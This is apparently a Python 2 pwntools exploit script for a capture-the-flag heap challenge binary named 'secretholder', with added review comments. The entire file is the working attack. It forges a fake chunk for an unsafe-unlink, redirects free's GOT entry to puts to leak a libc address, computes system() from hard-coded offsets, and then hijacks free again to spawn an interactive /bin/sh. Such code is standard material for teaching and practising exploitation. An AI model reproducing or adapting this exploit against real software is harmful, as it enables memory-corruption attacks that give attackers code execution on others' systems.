- from pwn import *
def keep(idx, data):
    """Select menu option 1 on the process ``p``, pick ``idx``, then send ``data``.

    Each prompt is consumed with recvuntil() before it is answered; ``data``
    is sent with sendline(), so a trailing newline is appended.
    """
    exchanges = [
        ('3. Renew secret', '1'),
        ('3. Huge secret', str(idx)),
    ]
    for prompt, reply in exchanges:
        p.recvuntil(prompt)
        p.sendline(reply)
    # Consume one further line of output before sending the payload.
    p.recvline()
    p.sendline(data)
def wipe(idx):
    """Select menu option 2 on the process ``p`` and answer the next prompt with ``idx``."""
    replies = (('3. Renew secret', '2'), ('3. Huge secret', str(idx)))
    for prompt, answer in replies:
        p.recvuntil(prompt)
        p.sendline(answer)
def renew(idx, data):
    """Select menu option 3 on the process ``p``, pick ``idx``, then send ``data`` raw.

    Unlike keep(), the payload goes out with send() rather than sendline(),
    i.e. no trailing newline is appended to ``data``.
    """
    steps = (('3. Renew secret', '3'), ('3. Huge secret', str(idx)))
    for prompt, answer in steps:
        p.recvuntil(prompt)
        p.sendline(answer)
    # Consume one further line of output before sending the payload.
    p.recvline()
    p.send(data)
if __name__ == '__main__':
    # Launch the local target binary; the menu helpers above all talk to
    # this module-global ``p``. With log_level='debug' pwntools echoes every
    # byte sent and received, which is the only tracing this script has.
    # NOTE(review): there is no error handling anywhere; if the process
    # exits early, the next recvuntil()/recvline() raises EOFError.
    p = process("./secretholder")
    context.log_level='debug'
    # Hard-coded addresses for this exact build of the target; nothing in
    # the script verifies them against the running binary.
    addr = 0x6020a8
    free_got = 0x602018
    puts_plt = 0x4006c0
    # Fixed sequence of menu interactions. The order of keep()/wipe()
    # calls is load-bearing for what follows and must not be reordered.
    keep(1,'AAAA')
    keep(2,'AAAA')
    keep(3,'AAAA')
    wipe(1)
    wipe(2)
    wipe(3)
    keep(3,'AAAA')
    wipe(1)
    keep(1,'AAAA')
    keep(2,'AAAA')
    # Payload written to entry 3 via renew(); the byte layout is specific
    # to this target and is built from the hard-coded ``addr`` above.
    fake_chunk = p64(0) + p64(0x21) + p64(addr - 0x18) + p64(addr - 0x10)
    junk = p64(0x20) + p64(0x90) + "A"*128 + p64(0x90) + p64(0x91) + "A"*128 + p64(0x90) + p64(0x91)
    renew(3,fake_chunk + junk)
    # ``sleep`` comes from the ``from pwn import *`` star-import.
    sleep(0.2)
    wipe(2)
    renew(3, p64(0)*3 + p64(free_got - 0x10))
    renew(3, p64(0)*2 + p64(puts_plt))
    # Marker string that is searched for in the output below.
    renew(1,'/bin/sh;' + "A"*8)
    wipe(1)
    p.recvuntil("/bin/sh;" + "A"*8)
    # Read 6 bytes after the marker and zero-pad to 8 for u64();
    # the ``[0:]`` slice is a no-op.
    leak = u64(p.recv(6)[0:].ljust(8,'\x00'))
    # Python 2 print statement.
    print "[+] Leak : 0x%x" % leak
    # Offset arithmetic tied to one particular libc build (presumably the
    # one the author tested against); any other libc yields a wrong value.
    system = leak - 0x3be7b8 + 0x45390 - 0x63c0
    renew(3, p64(0)*2 + p64(system))
    wipe(1)
    # Hand the connection over to the user.
    p.interactive()